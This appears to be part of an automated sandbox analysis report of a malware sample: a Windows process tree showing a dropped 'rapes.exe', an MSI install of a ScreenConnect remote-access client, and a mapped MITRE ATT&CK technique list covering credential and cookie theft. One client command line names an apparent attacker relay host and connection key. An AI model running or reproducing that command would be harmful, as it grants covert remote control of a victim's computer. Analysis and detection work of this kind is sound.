      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3056 /prefetch:2
      4⤵
      PID:6352
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 348 -s 2612
    3⤵
    - Program crash
    PID:1736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4692 -ip 4692
1⤵
PID:4616

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5856

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Executes dropped EXE
PID:6872

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:6896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1344 -ip 1344
1⤵
PID:3464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 348 -ip 348
1⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Executes dropped EXE
PID:6992

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Executes dropped EXE
PID:5212

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:3060
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:5684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2004 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 27359 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d94c097-4869-4e1c-b9ba-e2f69625c8ad} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" gpu
    3⤵
    PID:7120
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2336 -prefsLen 27237 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0ae0e35-9b40-48e7-9753-6b657157b70b} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" socket
    3⤵
    PID:5820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3292 -childID 1 -isForBrowser -prefsHandle 2836 -prefMapHandle 3568 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1092 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {759ce192-da56-4c27-ac84-cbe8b346e72a} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
    3⤵
    PID:2612
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2748 -childID 2 -isForBrowser -prefsHandle 3904 -prefMapHandle 3900 -prefsLen 32611 -prefMapSize 244628 -jsInitHandle 1092 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2049c835-6e32-4b48-b45e-e7152e105203} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
    3⤵
    PID:5208
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4808 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4832 -prefMapHandle 4812 -prefsLen 32611 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3943545-6fc6-4eca-b5a0-ec9b23884c4a} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" utility
    3⤵
    - Checks processor information in registry
    PID:5424
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 3 -isForBrowser -prefsHandle 5492 -prefMapHandle 5528 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1092 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3b194d6-abb7-461b-b9b6-7101d57ff179} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
    3⤵
    PID:4684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 4 -isForBrowser -prefsHandle 5480 -prefMapHandle 5500 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1092 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23b16c6f-4629-4c89-8ee7-9d3eec875e01} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
    3⤵
    PID:840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5788 -childID 5 -isForBrowser -prefsHandle 5888 -prefMapHandle 5892 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1092 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf05f1d4-fff2-4f9a-b5a7-7c4af2cf1080} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
    3⤵
    PID:1228
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4712 -childID 6 -isForBrowser -prefsHandle 6296 -prefMapHandle 2992 -prefsLen 27257 -prefMapSize 244628 -jsInitHandle 1092 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79813c79-a7f7-4998-a81e-ebb7c3821c21} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
    3⤵
    PID:6480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5848 -ip 5848
1⤵
PID:2768

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Executes dropped EXE
PID:1864

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4360
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 48E8DEA1323E13C67BC8FC09432C03B1 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4088
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI588C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240867515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:5452
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:5872
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 783E8F90B4B10AD27DCC14C0DA467EB9
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2372
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F8DC763D15E6F1FA1DC325FA1DFDD6C1 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:408

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:6384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6940 -ip 6940
1⤵
PID:4988

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=9b793bd7-7c45-46c7-b097-24a34c727ea6&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:6172
- C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "67fc6557-766d-4938-ab77-2c915c937eb0" "User"
  2⤵
  - Executes dropped EXE
  PID:4436
- C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "74c59040-6bc3-4099-add2-4cefe491c63c" "System"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion